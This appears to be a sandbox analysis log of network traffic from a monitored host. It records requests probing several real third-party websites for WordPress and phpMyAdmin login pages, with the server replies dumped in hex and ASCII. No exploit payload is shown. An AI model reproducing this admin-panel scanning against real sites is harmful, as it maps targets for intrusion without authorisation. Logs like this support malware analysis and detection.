70 75 62 6c 69 63 2f 31 2e 37 31 39 Data Ascii: vices/third-party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719
2023-12-22 20:15:01 UTC	271	IN	Data Raw: 72 72 65 64 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 6e 2d 61 6e 67 75 6c 61 72 2d 73 75 70 70 6f 72 74 65 64 2d 62 72 6f 77 73 65 72 2d 6c 69 6e 6b 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e Data Ascii: rred</h1> <div class="non-angular-supported-browser-link"> <span>Regardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port
173	192.168.2.4	64102	50.31.65.5	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:01 UTC	178	OUT	GET /wp-login.php HTTP/1.1 Host: saltdelcolom.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:02 UTC	555	IN	HTTP/1.1 200 OK Connection: close x-powered-by: PHP/7.3.33 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; secure x-frame-options: SAMEORIGIN transfer-encoding: chunked date: Fri, 22 Dec 2023 20:15:02 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:15:02 UTC	813	IN	Data Raw: 32 31 62 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 45 6e 74 72 61 20 26 6c 73 61 71 75 6f 3b 20 53 61 6c 74 20 64 65 6c 20 43 6f 6c 6f 6d 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 72 63 68 69 76 Data Ascii: 21b7<!DOCTYPE html><html lang="ca"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Entra &lsaquo; Salt del Colom — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noarchiv
2023-12-22 20:15:02 UTC	7826	IN	Data Raw: 73 3a 2f 2f 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 6f 67 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 32 2e 33 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 65 66 65 72 72 65 72 27 20 63 6f 6e 74 65 6e 74 3d 27 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 Data Ascii: s://saltdelcolom.com/wp-admin/css/login.min.css?ver=6.2.3' media='all' /><meta name='referrer' content='strict-origin-when-cross-origin' /><meta name="viewport" content="width=device-width" /><link rel="icon" href="https://saltdelcolom.com/wp-conte
2023-12-22 20:15:02 UTC	418	IN	Data Raw: 31 39 36 0d 0a 09 09 09 3c 73 63 72 69 70 74 3e 0d 0a 09 09 09 2f 28 74 72 69 64 65 6e 74 7c 6d 73 69 65 29 2f 69 2e 74 65 73 74 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 26 26 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 26 26 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 68 61 73 68 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 65 3d 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 2f 5e 5b 41 2d 7a 30 2d 39 5f 2d 5d 2b 24 2f 2e 74 65 73 74 28 65 29 26 26 28 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 29 26 Data Ascii: 196<script>/(trident\|msie)/i.test(navigator.userAgent)&&document.getElementById&&window.addEventListener&&window.addEventListener("hashchange",function(){var t,e=location.hash.substring(1);/^[A-z0-9_-]+$/.test(e)&&(t=document.getElementById(e))&

Session ID	Source IP	Source Port	Destination IP	Destination Port
174	192.168.2.4	64146	50.31.65.5	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:01 UTC	177	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: saltdelcolom.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:02 UTC	535	IN	HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.3.33 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://saltdelcolom.com/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked date: Fri, 22 Dec 2023 20:15:02 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:15:02 UTC	833	IN	Data Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 74 69 74 6c 65 3e 4e 6f 20 73 26 23 38 32 31 37 3b 68 61 20 74 72 6f 62 61 74 20 6c 61 20 70 c3 a0 67 69 6e 61 20 26 23 38 32 31 31 3b 20 53 61 6c 74 20 64 Data Ascii: 10000<!DOCTYPE html><html lang="ca"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>No s’ha trobat la pgina – Salt d
2023-12-22 20:15:02 UTC	14994	IN	Data Raw: 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 32 2e 33 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 2c 69 3d 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 70 3d 69 Data Ascii: \/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/saltdelcolom.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.2.3"}};/! This file is auto-generated /!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i
2023-12-22 20:15:02 UTC	16384	IN	Data Raw: 6e 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 35 38 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 35 37 31 34 32 38 35 37 31 34 32 38 36 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 65 6d 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 31 70 78 3b 7d 62 6f 64 79 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 69 7a Data Ascii: n,.elementor-button-wrapper .elementor-button:visited{color:rgba(0,0,0,0.58);}.elementor-button-wrapper .elementor-button{font-weight:600;font-size:12px;font-size:0.85714285714286rem;line-height:1em;letter-spacing:1px;}body .elementor-button.elementor-siz
2023-12-22 20:15:03 UTC	16384	IN	Data Raw: 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 7d 3a 72 6f 6f 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 20 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 31 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 31 29 3b 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 Data Ascii: -global-color-0-color{color:var(--ast-global-color-0);}:root .wp-block-button .has-ast-global-color-0-background-color{background-color:var(--ast-global-color-0);}:root .has-ast-global-color-1-color{color:var(--ast-global-color-1);}:root .has-ast-global-c
2023-12-22 20:15:03 UTC	16384	IN	Data Raw: 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b Data Ascii: eft;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained > .aligncenter{margin-left: auto !important;margin-right: auto !important;
2023-12-22 20:15:03 UTC	566	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 2c 20 2e 77 63 2d 62 6c 6f 63 6b 2d 67 72 69 64 5f 5f 70 72 6f 64 75 63 74 2d 6f 6e 73 61 6c 65 7b 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 35 38 29 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 36 63 62 36 30 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 63 62 36 30 30 3b 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2e 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 65 73 73 61 67 65 20 61 2e 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 23 72 65 73 70 6f 6e Data Ascii: p-block-button__link, .wc-block-grid__product-onsale{color:rgba(0,0,0,0.58);border-color:#6cb600;background-color:#6cb600;}.woocommerce a.button:hover, .woocommerce button.button:hover, .woocommerce .woocommerce-message a.button:hover,.woocommerce #respon
2023-12-22 20:15:03 UTC	16384	IN	Data Raw: 62 35 63 64 0d 0a 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 36 63 62 36 30 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 36 63 62 36 30 30 3b 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2e 62 75 74 74 6f 6e 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 62 75 74 74 6f 6e 2e 62 75 74 74 6f 6e 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 65 73 73 61 67 65 20 61 2e 62 75 74 74 6f 6e 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 23 72 65 73 70 6f 6e 64 20 69 6e 70 75 74 23 73 75 62 6d 69 74 2e 61 6c 74 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2e 62 75 74 74 6f 6e 2e 61 6c 74 2c 20 2e 77 Data Ascii: b5cdlock-button__link:hover{color:#000000;border-color:#6cb600;background-color:#6cb600;}.woocommerce a.button, .woocommerce button.button, .woocommerce .woocommerce-message a.button, .woocommerce #respond input#submit.alt, .woocommerce a.button.alt, .w
2023-12-22 20:15:03 UTC	16384	IN	Data Raw: 69 6e 67 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 68 65 63 6b 6f 75 74 20 66 6f 72 6d 20 23 6f 72 64 65 72 5f 72 65 76 69 65 77 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 68 65 63 6b 6f 75 74 20 66 6f 72 6d 20 23 6f 72 64 65 72 5f 72 65 76 69 65 77 5f 68 65 61 64 69 6e 67 7b 77 69 64 74 68 3a 34 30 25 3b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 3b 63 6c 65 61 72 3a 72 69 67 68 74 3b 7d 7d 73 65 6c 65 63 74 2c 20 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 2d 2d 73 69 6e 67 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c Data Ascii: ing, .woocommerce-page.woocommerce-checkout form #order_review, .woocommerce-page.woocommerce-checkout form #order_review_heading{width:40%;float:right;margin-right:0;clear:right;}}select, .select2-container .select2-selection--single{background-image:url
2023-12-22 20:15:03 UTC	13786	IN	Data Raw: 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 68 74 74 70 73 3a 2f 2f 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 2f 22 3e 0a 09 3c 6c 61 62 65 6c 3e 0a 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 74 65 78 74 22 3e 43 65 72 63 61 3a 3c 2f 73 70 61 6e 3e 0a 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 73 65 61 72 63 68 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 66 69 65 6c 64 22 20 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 43 65 72 63 61 20 26 68 65 6c 6c 69 70 3b 22 20 76 61 6c 75 65 3d 22 22 20 6e 61 6d 65 3d 22 73 22 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 3e 0a 09 09 09 3c 2f 6c 61 62 65 6c 3e 0a 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 Data Ascii: lass="search-form" action="https://saltdelcolom.com/"><label><span class="screen-reader-text">Cerca:</span><input type="search" class="search-field" placeholder="Cerca …" value="" name="s" tabindex="-1"></label><input type="submit"

Session ID	Source IP	Source Port	Destination IP	Destination Port
175	192.168.2.4	64134	34.136.28.237	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:01 UTC	176	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: ispsolucoes.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:01 UTC	828	IN	HTTP/1.1 200 OK x-guploader-uploadid: ABPtcPrFmAKMbAPTVGT8McVpSKjTHX4mAKlUgQOXwl5kTeL1KFMFEQ7cQs-T59wCdZbGVZF7c_Y date: Fri, 22 Dec 2023 20:15:01 GMT Cache-Control: max-age=3600 expires: Sat, 21 Dec 2024 20:15:01 GMT last-modified: Wed, 29 Nov 2023 21:27:35 GMT etag: W/"6cb298b6f5886c6f0163450b2833fa5e" vary: Accept-Encoding x-goog-generation: 1701293255952775 x-goog-metageneration: 1 x-goog-stored-content-encoding: gzip x-goog-stored-content-length: 1195 content-type: text/html x-goog-hash: crc32c=rey8dw==, md5=bLKYtvWIbG8BY0ULKDP6Xg== x-goog-storage-class: STANDARD access-control-allow-origin: * access-control-expose-headers: Content-Type x-guploader-response-body-transformations: gunzipped warning: 214 UploadServer gunzipped transfer-encoding: chunked server: UploadServer connection: close
2023-12-22 20:15:01 UTC	2888	IN	Data Raw: 62 33 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 21 2d 2d 0a 20 20 20 20 49 66 20 79 6f 75 20 61 72 65 20 73 65 72 76 69 6e 67 20 79 6f 75 72 20 77 65 62 20 61 70 70 20 69 6e 20 61 20 70 61 74 68 20 6f 74 68 65 72 20 74 68 61 6e 20 74 68 65 20 72 6f 6f 74 2c 20 63 68 61 6e 67 65 20 74 68 65 0a 20 20 20 20 68 72 65 66 20 76 61 6c 75 65 20 62 65 6c 6f 77 20 74 6f 20 72 65 66 6c 65 63 74 20 74 68 65 20 62 61 73 65 20 70 61 74 68 20 79 6f 75 20 61 72 65 20 73 65 72 76 69 6e 67 20 66 72 6f 6d 2e 0a 0a 20 20 20 20 54 68 65 20 70 61 74 68 20 70 72 6f 76 69 64 65 64 20 62 65 6c 6f 77 20 68 61 73 20 74 6f 20 73 74 61 72 74 20 61 6e 64 20 65 6e 64 20 77 69 74 68 20 61 20 73 6c 61 73 68 20 22 2f 22 20 Data Ascii: b3c<!DOCTYPE html><html><head> ... If you are serving your web app in a path other than the root, change the href value below to reflect the base path you are serving from. The path provided below has to start and end with a slash "/"

Session ID	Source IP	Source Port	Destination IP	Destination Port
176	192.168.2.4	64191	104.24.82.4	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:01 UTC	173	OUT	GET /wp-admin/ HTTP/1.1 Host: thenile.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:01 UTC	623	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:15:01 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close location: https://www.thenile.com.au/wp-admin/ via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0byv%2BFTnRESenVZmrajCPwkZ2AYpDzuzoRCS9shchaZEw9L6pe0KS63kcztMWrWT5Uny5Oe%2F%2BzzngAC2iqFe4PsbZaGmwjFgAVfwaqbGdTcb5Ady3hylXT2Xf3CwnaTo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08d269bd7449-MIA
2023-12-22 20:15:01 UTC	250	IN	Data Raw: 66 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 6d 2e 61 75 2f 77 70 2d 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: f4<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.thenile.com.au/wp-admin/">here</a>.</p></body></html>
2023-12-22 20:15:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
177	192.168.2.4	64377	104.26.6.37	443

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:01 UTC	207	OUT	GET /domain_profile.cfm?d=keywordranker.com HTTP/1.1 Host: www.hugedomains.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:01 UTC	794	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:01 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close cache-control: private vary: Accept-Encoding set-cookie: site_version_phase=108; expires=Mon, 16-Dec-2024 20:15:01 GMT; path=/ set-cookie: site_version=HDv3; expires=Mon, 16-Dec-2024 20:15:01 GMT; path=/ x-powered-by: ASP.NET lb: TclPrdLbHd3 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=v7CMubZnhP66dBsKHFASToCSUIV8MGSyYsuQIzPnFe9ZDY3ue1bHZjcRH96P2mxVh3Bz93SRBS2xdR%2ByL6UBVH4dLXpZ9V7nHSrkIgCXuecyCKRM9DJh43QDdMSkmlNb8piGk%2F8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08d39ec57435-MIA
2023-12-22 20:15:01 UTC	575	IN	Data Raw: 37 63 38 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 6f 6b 69 65 79 65 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 63 6f 6f 6b 69 65 79 65 73 2e 63 6f 6d 2f 63 6c 69 65 6e 74 5f 64 61 74 61 2f 65 37 31 62 63 35 33 66 31 63 62 38 38 36 36 36 64 31 36 30 63 31 65 32 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 